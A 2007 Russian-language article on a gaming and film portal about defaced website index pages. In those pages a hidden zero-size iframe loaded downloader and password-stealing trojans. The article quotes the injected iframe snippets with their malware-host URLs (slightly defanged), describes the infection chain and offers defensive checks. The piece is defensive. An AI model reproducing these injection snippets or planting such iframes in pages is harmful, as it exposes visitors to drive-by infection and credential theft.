Главная сайта | Форум | Фотоальбом | Регистрация   | Вход | Cайт в избранное | Правила сайта и форума

Приветствую Вас Гость | RSS


Фильмы | Онлайн Видео | Софт | Новости и Статьи | Игры онлайн | Фотоальбом | Форум

ДЛЯ ПРОСМОТРА САЙТА РЕКОМЕНДУЕТСЯ ИСПОЛЬЗОВАТЬ:  Uran - браузер от uCoz на базе проекта Chromium. | Google ChromeOpera | Firefox 


МЕНЮ САЙТА

ПОИСК ПО САЙТУ

Gamesblender 675: новый шутер от Valve, Stellar Blade на ПК и ускоренный ИИ на GeForce RTX

Gamesblender № 674: новые боссы PlayStation, опасная стратегия Microsoft и ассасины в Японии

Gamesblender № 673: внезапная Hades II, закрытие студий Bethesda и контроль видеоигр в России

Gamesblender № 661: будущее Xbox, новая игра авторов Ori, «неправильная» Subnautica 2 и прощание с Dead Cells

Gamesblender № 660: «портативки» от Sony и Microsoft, эксклюзивы Xbox на PlayStation, сделка Epic и Disney и показ Final Fantasy VII Rebirth

Tekken 8: 10 аниме из 10

Gamesblender № 659: Death Stranding 2 и другие показы State of Play, новый президент Blizzard, отмена Deus Ex и перенос «Смуты»

Gamesblender № 657: дата выхода S.T.A.L.K.E.R. 2, «Индиана Джонс» от авторов Wolfenstein, закрытие Piranha Bytes, Larian против подписок

Gamesblender № 656: ремастер Half-Life 2, сиквел Cyberpunk 2077 и новый конкурент Steam Deck

Gamesblender № 654: главные события 2023 года в игровой индустрии

Игромания! Игровые новости, 3 апреля (Destiny 2, StarCraft Remastered, The Secret World)

Игромания! Игровые новости, 18 июля (Pokémon GO, Pokémon GO, Pokémon Gооо!!!!)

Игромания! Игровые новости, 2 мая (Uncharted 4, Dark Souls, Джон Ромеро, The Walking Dead)

❆ Игромания! Главные ИГРОВЫЕ НОВОСТИ 2017 года

Во что поиграть на этой неделе — 24 июня (Star Wars: Battlefront DLC, Resident Evil: Umbrella Corps)

Игромания! Игровые новости, 10 октября (Gears of War, World of Tanks, Dota 2)

Во что поиграть на этой неделе — 07 февраля + Лучшие скидки на игры

Во что поиграть на этой неделе — 9 марта (Final Fantasy XV: Windows edition, Fear Effect Sedna)
СТАТИСТИКА
Всего материалов:
Фильмомания: 1513
Видео: 220
Каталог файлов: 98
Каталог статей: 6795
Фотоальбом: 1236
Форум: 1142/8143
Каталог сайтов: 386

Всего зарегистрировано:
Зарегистрировано: 1683
Сегодня: 0
Вчера: 0
За неделю: 1
За месяц: 10

Из них:
Пользователи: 1608
Проверенные: 23
Друзья: 5
Редакторы: 0
Журналисты: 8
В вечном бане: 33
Модераторы: 1
Администраторы: 3

Из них:
Парней 1268
Девушек 413


ON-Line всего: 1
Гостей: 1
Пользователей: 0

Сейчас на сайте:


Кто был?
Фокусник,
ВЫ МОЖЕТЕ ОКАЗАТЬ ПОДДЕРЖКУ ЗА ТРУДЫ, ПОЖЕРТВОВАВ ЛЮБУЮ СУММЫ.

WEBMONEY



Категории каталога

Главная » Статьи » Статьи » Статьи: Общие

Новый троян, похищающий пароли доступа

Новый троян, похищающий пароли доступа и не определяющийся антивирусными программами.
Как бороться с прокатившейся эпидемией изменения
индексных страниц сайтов?
 

Я не зря написал слово "эпидемия". Дело в том, что в конце 2006 - начале 2007 года владельцы сайтов столкнулись с неприятной ситуацией. При открытии индексной страницы сайта (хостинг значение не имеет, платный или бесплатный) на компьютер начинал подгружаться вирус-троян, который антивирусной программой не определялся.
Оказывается, в код страницы были внесены изменения - после завершающего кода конца страницы была добавлена ссылка на сайт-вирусоноситель, с которого собственно и загружался троянец.
Некоторые индексные страницы вообще "стирались", то есть, на них не оставалось ни одного тега, чисто тебе чистый лист бумаги :).
Соответственно прокатилась волна претензий и обвинений к хостерам, из-за "взлома" хостов пользователей. Явление приняло такие масштабы, что впору было обвинять именно хостеров в том, что они допустили похищение баз аккаунтов пользователей и теперь злоумышленники их используют.
Один такой случай, правда, был в прошлом году с valuehost.ru, когда была "утянута" целая база паролей с сервера (за достоверность не ручаюсь), но в теперешней ситуации винить хостеров в заражении индексных страниц несколько преждевременно.

Говорю это на основании собственного опыта, так как я сам убедился, что в один прекрасный день были дефейснуты (хакнуты) индексные страницы этого сайта и бесплатников на narod.ru и nm.ru. Причем, вход на фтп был выполнен с моим аккаунтом и паролем, то есть без брутфорса и подобных вещей.
 Суть вносимых изменений заключается в том, что на странице index.html (или index.php) после завершающего тега '/html' появляется следующий участок кода:
iframe src=http://pynet.ws/col/index.php width="0" height="0" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" и т.д.
Это может быть ссылка на http://www.counter-pr.info/sp_pack/counter/index.php, http://mz0i.info/gera/index.php или iframe src='http://ltds.biz/go.php?id=1781&user_name=sam' width=1 height=1 /iframe или другой сайт

Я намеренно убрал открывающие кавычки и гиперссылку, чтобы Вы не попались на эту ловушку :). Тег iframe, в который заключена ссылка, имеющий значение width="0" и height="0" говорит о том, что Вы не увидите открывающееся окно "левого" сайта, поскольку заданы нулевые координаты этого окна.
Сразу предвижу закономерный вопрос о лохизме и неиспользовании антивируса на компьютере :)) Так вот, антивирусом ДрВеб (DrWeb) лаборатории Данилова пользуюсь уже около 7 лет, претензий к нему не имел, обновляю постоянно. Плюс к этому на компьютере стоит Agnitum Outpost Firewall, который говорит свое веское слово в спорных случаях, типа "программа c:/windows/r.exe запрашивает исходящее соединение ..." и так далее. Таким способом, как я думал, мне удавалось иметь 100% уверенность в завтрашнем дне smile Оказалось, что все не так просто...

Анализ возможного заражения привел к парадоксальному результату. Индексные страницы менялись после того, как я проводил авторегистрацию сайтов в каталогах с помощью программы AllSubmitter. Сама программа, конечно, не виновата, просто в базе данных находились "зараженные" ссылки. Простая логика говорит о том, что в этой базе находится одна или несколько ссылок на сайты, с которых загружается вирус-троян.

Но проблема заключалась не только в паролях доступа к ftp. Кроме того была сделана попытка утянуть пароль на аську-семизначник, который удалось восстановить ретривом. Больше всего подходит под результаты ущерба Trojan типа Pinch, так как он умеет обходить файерволл и антивирусные программы, а "тырит" все, к чему может дотянуться, в том числе пароли, сохраненные в IE, CuteFTP (мой случай), Total Commander и еще десятке различных программ.
Исследование ссылки, которая дописывалась на индексную страницу моего сайта дали возможность предположить, что имеется в виду комплексная атака на компьютер. То есть:
Сначала загружается Trojan-Downloader.VBS. Psyme.fc - троянская программа-загрузчик других троянов. Именно она подгружает еще два вируса - Trojan-PSW.Win32.LdPinch.bik (или модификация) и Trojan.Win32.Agent.oh (не обязательно).

Самое интересное, что как ДрВеб, бывший на компьютере, так и впоследствии скачанный и установленный после него Антивирус KAV, определяли, что на компьютер закачивается троян и его ликвидировали. Вроде... На самом деле, это мог быть просто известный троян, который служил ширмой.
Еще один ньюанс: с самого начала загрузки файлов с зараженного сайта на рабочем столе мог создаваться и выполнялся файл new.exe (его копия могла создаваться в папке Temp и папке интернет-обозревателя - в моем случае Maxthon). В папке Виндовс появлялись файлы названиями r.exe или c.exe, которые антивирусом не опознавались как опасные.
По свидетельствам других пользователей в папке Windows мог создаваться поддельный файл с названием svchost.exe (оригинал находится в папке System32). Тогда в процессах операционной системы трудно определить, какой из процессов, используемых программой svchost.exe есть истинный, а какой поддельный.
Но! Существует одно "но" - трояны типа Pinch надежно отлавливаются как Доктор Веб, так и антивирусом Касперского. Вроде отлавливаются... Возможно предположение, что запущена или модификация этого вируса, которая успевает обойти антивирус, или работает другой вирус, который маскируется "Пинчем".
Как видим, прослеживается четкая тенденция - заражение индексной страницы, закачка на компьютер трояна-даунлоадера, закачка этим трояном одного или нескольких троянцев, которые похищают пароли, передача паролей злоумышленнику.

Такая передача может идти как через почтовый клиент (отправляется письмо на горячий мейл), так и через командную строку Internet Explorer (антивирусом не определяется). Вполне возможно, что троян мог использовать и имеющийся фтп-клиент для того, чтобы модифицировать индексную страницу. Вариантов здесь множество.
Одно замечание: в моем случае действие трояна можно было заметить по тому, что была запущена служба Telnet и удаленное управление рабочим столом, так же как и удаленный доступ к реестру. Можете проверить прямо сейчас, зайдите через "Панель управления/Администрирование" в список служб, и если они у Вас работают, отключите
Существовал еще один вариант, почему не определялся вирус, причем, достаточно вероятный. Используемая программа-троян могла принадлежать к руткитам (программам, внедряемым в ядро операционной системы), которые трудно обнаруживаются антивирусами. Или используется уязвимость Интернет Эксплорер версии 6 (Internet Explorer 6). Вот как о ней писалось: Удаленный пользователь может с помощью специально сформированной Web страницы загрузить на удаленную систему произвольный HTA файл и затем выполнить его с привилегиями пользователя, запустившего браузер. Удачная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе.
Спрашивается, что делать? Первое, проверьте свои сайты, если при открытии индексной страницы Ваш антивирус скажет, что выполняется или загружается троян, Вы заразились. Если даже и ничего не произойдет, просмотрите HTML-код, на предмет присутствия после тега '/html' внедренного тега 'iframe' с атрибутами "width="0" height="0" или width="1" height="1".
Если с Вами произошла эта неприятность, то как от нее избавиться читайте на странице:
Очистка операционной системы от вирусов, троянов и программ-шпионов

Так как поиск уязвимостей хакерами ориентирован на Internet Explorer, есть и компромиссный вариант: использовать альтернативный браузер, не базирующийся на платформе IE. Это Firefox (огненная лиса) на движке Mozilla. Ознакомиться с ним Вы можете по баннеру ниже:

Вы можете попробовать новый быстрый браузер Mozilla Firefox — это браузер, обладающий функцией блокировки всплывающих окон и просмотра страниц на вкладках, а также функциями безопасности и конфиденциальности. В браузер Firefox интегрирована панель инструментов Google, чтобы предоставить пользователям еще больше полезных функций: поиск в Google, проверку правописания и автозаполнение.
Установите и попробуйте - Вы не потеряете ничего. А вот если Mozilla Firefox оправдает Ваши ожидания, тогда забудете про все проблемы, связанные с осликом ИЕ.
Новую информацию об этой теме можете прочитать на странице

Если на странице вы заметили в посте отсутствие изображений, просьба сообщить , нажав на кнопку.



После прочтения материала " Новый троян, похищающий пароли доступа ", можно просмотреть форум и поискать темы по данной игре.



ДРУГИЕ МАТЕРИАЛЫ
Fallout 3: новые скриншоты, превью, видео
Sony отзывает 440 тысяч ноутбуков VAIO
Троян выдает себя за Антивирус Касперского
Патентное разбирательство угрожает Microsoft и Apple
Как продвигается работа над Diablo 3
Снимки опытного образца платы Gigabyte GA-X58-Extreme
15 советов по воспитанию мужа
Windows Seven – следующая ОС после Windows Vista
Детектирована 25-миллионная вредоносная программа
Европейцы заплатят за Windows 7 больше, чем американцы
Угроза Земле
Российская девочка-робот в сарафане дерётся в игре Tekken 6
Плата GIGABYTE на базе AMD 780G с DDR3-памятью на борту
Мощный ноутбук Samsung R560 за 34 тысячи
Штраф в $1,9 млн за 24 песни
Red Faction: Guerrilla стала неожиданным хитом
Японцам показали кусочек Fallout 3
Турбовидеокарта" на Radeon HD 4870 от HIS
IDF SF 2008: подробности об Intel Core i7, 6-ядерный Xeon устанавливает мировой рекорд
Как выглядит мультиплеер Far Cry 2

Если вам понравился материал "Новый троян, похищающий пароли доступа", - поделитесь ним с другими.


html-cсылка на публикацию
BB-cсылка на публикацию
Прямая ссылка на публикацию


Категория: Статьи: Общие | Добавил: Фокусник (14.08.2007)
Просмотров: 3974

Ниже вы можете добавить комментарии к материалу " Новый троян, похищающий пароли доступа "

Внимание: Все ссылки и не относящиеся к теме комментарии будут удаляться. Для ссылок есть форум.


Всего комментариев : 0
avatar
ФОРМА ВХОДА
ПОЖЕРТВОВАНИЯ



WMZ: Z143317192317
WMB: X706980753649

Boosty - Donate

Payeer: P48650932
На кофе / ko-fi
ПАРТНЕРЫ

World of Warships — это free-to-play ММО-экшен, который позволяет окунуться в мир масштабных военно-морских баталий. Возьмите под управление легендарные боевые корабли первой половины ХХ века и завоюйте господство на бескрайних океанских просторах.

Курсы обмена WebMoney


Что такое ресурс Turbobit и как качать.


Получи 10 ГБ места бесплатно, на всю жизнь.


Boosty – сервис по сбору донатов.
Команда мечты — Трейлер (2018)
Команда мечты — Трейлер (2018)
Обзор horizon chase turbo | прежде чем купить
Обзор horizon chase turbo | прежде чем купить
Лучшие новые фильмы, вышедшие в хорошем качестве в июне 2018
Лучшие новые фильмы, вышедшие в хорошем качестве в июне 2018
Санктум 3D / Sanctum 2011
Санктум 3D / Sanctum 2011
4 Strings - Take Me Away
4 Strings - Take Me Away
Видеообзор dlc игры Titanfall
Видеообзор dlc игры Titanfall
Игрозор №197
Игрозор №197
Tasha - Сережа
Tasha - Сережа
Видеообзор игры Loadout
Видеообзор игры Loadout
Gamesblender №272: слухи о новой Splinter Cell, пацифистская Dishonored 2 и зомби в Metal Gear
Gamesblender №272: слухи о новой Splinter Cell, пацифистская Dishonored 2 и зомби в Metal Gear

Сборник приколов в картинках и фото (24 шт)
Сборник приколов в картинках и фото (24 шт)
Котоматрица (36 фото)
Котоматрица (36 фото)
Фото-приколов много не бывает (35 шт)
Фото-приколов много не бывает (35 шт)
Немного прикольных демотиваторов
Немного прикольных демотиваторов
Прикольная коллекция демотивационных приколов
Прикольная коллекция демотивационных приколов
Котики-антидепрессанты
Котики-антидепрессанты
Люди с силой воли, которые решили похудеть и сделали это (22 фото)
Люди с силой воли, которые решили похудеть и сделали это (22 фото)
Сюрреалистические фотоманипуляции Зака Изи (31 фото)
Сюрреалистические фотоманипуляции Зака Изи (31 фото)
СТАТИСТИКА
Яндекс.Метрика


Copyright © 2000-2024, Alex LTD and System PervertedХостинг от uCoz